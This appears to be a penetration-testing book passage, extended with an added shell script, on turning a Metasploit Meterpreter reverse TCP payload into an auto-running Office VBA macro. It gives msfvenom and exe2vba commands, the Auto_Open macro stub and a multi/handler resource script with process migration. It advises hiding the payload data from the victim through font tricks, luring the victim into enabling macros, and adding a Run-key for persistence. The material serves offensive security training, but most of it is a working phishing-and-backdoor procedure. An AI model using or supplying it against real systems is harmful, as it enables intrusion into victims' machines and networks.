Conducting attacks using VBScript

Visual Basic Scripting Edition (VBScript) is an Active Scripting language developed by Microsoft. It was designed as a lightweight, Windows-native language for running small programs. VBScript has shipped by default with every desktop release of Microsoft Windows since Windows 98, which makes it an attractive vehicle for client-side attacks. In August 2018, the DarkHotel advanced persistent threat (APT) group exploited a vulnerability in the Windows VBScript engine that was reachable through Internet Explorer 11. Note that the macro payloads generated in this section are strictly VBA (Visual Basic for Applications), the dialect that runs inside Microsoft Office applications; VBA and VBScript share most of their syntax but execute in different hosts (the Office application versus wscript.exe or cscript.exe).

To build the macro payload for this attack, we'll use msfvenom from the command line:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

The -f vba-exe option tells msfvenom to emit the payload as a VBA macro with the executable embedded as data rather than as a binary file. The output is a text file with two distinct parts, a MACRO CODE section and a PAYLOAD DATA section, as shown in the following screenshot:

To use the script, open a Microsoft Office document and create a macro (the exact menu path depends on the version of Microsoft Office in use, not on the version of Windows). Copy the first part of the text given in the following information box (from Sub Auto_Open() to the final End Sub statement) into the macro editor and save the document in a macro-enabled format (for example .docm or .xlsm, or the legacy .doc or .xls):

'************************************************************** 
'* 
'* MACRO CODE 
'* 
'************************************************************** 
 
Sub Auto_Open()
        Pzstu12
End Sub
' Additional code removed for clarity: the generated Pzstu12 routine reads
' the PAYLOAD DATA back out of the document body, writes it to disk as an
' executable and launches it.

' Auto_Open is the legacy auto-run macro name recognised by Excel, and
' Workbook_Open is the Excel event handler that belongs in the ThisWorkbook
' module. In Word the equivalent entry points are AutoOpen or Document_Open.
Sub Workbook_Open()
        Auto_Open
End Sub

Next, copy the second part of the output, the PAYLOAD DATA block, into the body of the document itself; at run time the macro reads this block back out of the document, writes it to disk as an executable and runs it. A partial excerpt of the payload data is shown in the following screenshot:

The payload data is recognizable as a hex dump, and a reader who scrolls through the document will see it, so you may wish to hide it, for instance by minimizing the font size and matching the font colour to the document's background. This conceals it from the victim only; anti-virus engines and macro scanners inspect the file contents, not its rendering.

The attacker must set up a listener in Metasploit. After entering msfconsole at the command prompt, the attacker will typically enter the following commands, setting the host, port and payload. The lhost and lport values must be identical to the LHOST and LPORT given to msfvenom when the payload was generated, otherwise the macro will connect to the wrong address; note that the values shown here differ from those in the msfvenom command above, so in practice one or the other must be adjusted. In addition, the attacker configures the session to migrate automatically into the more stable explorer.exe process, as shown in the following lines of command:

use exploit/multi/handler 
set lhost 192.168.43.130
set lport 4444
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Add the preceding lines into a file, call it vbexploit.rc, and run the following command:

msfconsole -q -r vbexploit.rc
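The three steps above (generating the macro, separating its two parts, and starting a matching handler) are easy to get out of step when done by hand. The following shell script is an added example and is not code from the book or from Metasploit: it derives both the msfvenom command line and the handler resource script from one set of LHOST/LPORT/payload variables, so the two cannot disagree, and it splits a vba-exe output file at the PAYLOAD DATA banner into the macro text (for the VBA editor) and the data block (for the document body). The IP address, port and file names are placeholders, and the sample output written by write_sample is a constructed stand-in that copies msfvenom's banner layout but contains a single fake data line rather than a real payload. The splitter also works on the output of exe2vba.rb, which uses the same two-part layout.

```shell
#!/bin/sh
# Added example: keep payload and handler in step, and split vba-exe output.
# Placeholders: LHOST/LPORT are the attacker's listener; file names are
# arbitrary. Nothing here contacts a target.

LHOST=${LHOST:-192.168.0.24}
LPORT=${LPORT:-8080}
PAYLOAD=${PAYLOAD:-windows/meterpreter/reverse_tcp}

# Print the msfvenom command that builds the macro for the handler below.
# Both read the same variables, so LHOST/LPORT cannot drift apart.
msfvenom_cmd() {
    printf 'msfvenom -a x86 --platform windows -p %s LHOST=%s LPORT=%s -e x86/shikata_ga_nai -f vba-exe -o %s\n' \
        "$PAYLOAD" "$LHOST" "$LPORT" "$1"
}

# Write the resource script for the matching multi/handler. ExitOnSession
# false together with exploit -j keeps the handler listening after the first
# victim connects instead of exiting with the first session.
handler_rc() {
    cat >"$1" <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set lhost $LHOST
set lport $LPORT
set autorunscript migrate -n explorer.exe
set ExitOnSession false
exploit -j
EOF
}

# Split a vba-exe output file: lines before the PAYLOAD DATA banner are the
# macro, lines after it are the data block. Decorative '* banner lines and
# blank lines are dropped from both parts.
split_vba_exe() {
    awk -v q="'" -v macro="$2" -v data="$3" '
        /PAYLOAD DATA/            { part = "data"; next }
        substr($0, 1, 2) == q "*" { next }
        NF == 0                   { next }
        part == "data"            { print > data; next }
                                  { print > macro }
    ' "$1"
}

# Constructed stand-in for msfvenom output: same banners, one fake data line.
write_sample() {
    cat >"$1" <<'EOF'
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
    Pzstu12
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

&H4D&H5A&H90&H00
EOF
}

# Demonstration on the constructed sample.
work=$(mktemp -d)
write_sample "$work/sample.vba"
split_vba_exe "$work/sample.vba" "$work/macro.vba" "$work/data.txt"
handler_rc "$work/vbexploit.rc"
msfvenom_cmd "$work/payload.vba"
printf 'macro part: %s lines, data part: %s lines\n' \
    "$(wc -l <"$work/macro.vba")" "$(wc -l <"$work/data.txt")"
printf 'start the listener with: msfconsole -q -r %s\n' "$work/vbexploit.rc"
```

Run the printed msfvenom command on Kali to produce the real payload file, pass it to split_vba_exe in place of the sample, and start the handler with the printed msfconsole line; the rc file and the macro then carry the same address and port by construction.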

When the document is sent to the target, Office displays a security warning when it is opened, so attackers rely on social engineering to persuade the intended victim to click Enable Content. One of the most common methods is to embed the macro in a Microsoft Word document or Excel spreadsheet that appears to need macros for some legitimate purpose, for example a document configured to play a game.

Opening the document with macros enabled creates a reverse TCP shell back to the attacker, who can then conduct post-exploitation activities. Note that the session lives only as long as the process hosting it: migrating into explorer.exe lets it survive the Office application being closed, but surviving a reboot requires a separate persistence mechanism.

To extend this attack methodology, we can convert any executable into a VBA macro using msf-exe2vba directly from the command line, or exe2vba.rb located at /usr/share/metasploit-framework/tools/exploit/.

In this example, we will use the same .exe that we created; that is, first create a backdoor using the Metasploit framework. In the older msfpayload syntax, X designates that the backdoor is written out as an executable (attack.exe); the msfvenom equivalent is -f exe -o attack.exe. This is shown in the following screenshot:

Next, run exe2vba.rb to convert the executable into a VBA macro with the following command, making sure the correct path names are used (the output is a VBA text file with the same MACRO CODE and PAYLOAD DATA layout as the msfvenom -f vba-exe output):

root@kali:/usr/share/metasploit-framework/tools/exploit# ruby exe2vba.rb ~/attack.exe attack.vba
[*] Converted 20254 bytes of EXE into a VBA script

This allows the executable to be carried inside a macro-enabled Microsoft Office document and sent to a client. The macro can be used to launch the reverse shell and to alter the system registry (for example by adding a Run key) so that the shell is restored after a reboot. We have found attacks of this type to be one of the most effective ways to bypass network security controls and maintain a connection into a secured network, because the connection is outbound, originates inside the network and is started by the user's own application.

From an attacker's perspective, exploits based on VBScript and VBA macros have significant advantages, but they are rapidly being displaced by PowerShell, a far more powerful scripting language. Bear in mind also that current Office builds block macros by default in documents carrying the Mark of the Web (files downloaded from the internet or received as e-mail attachments), so the victim must first unblock the file before the Enable Content prompt even appears.
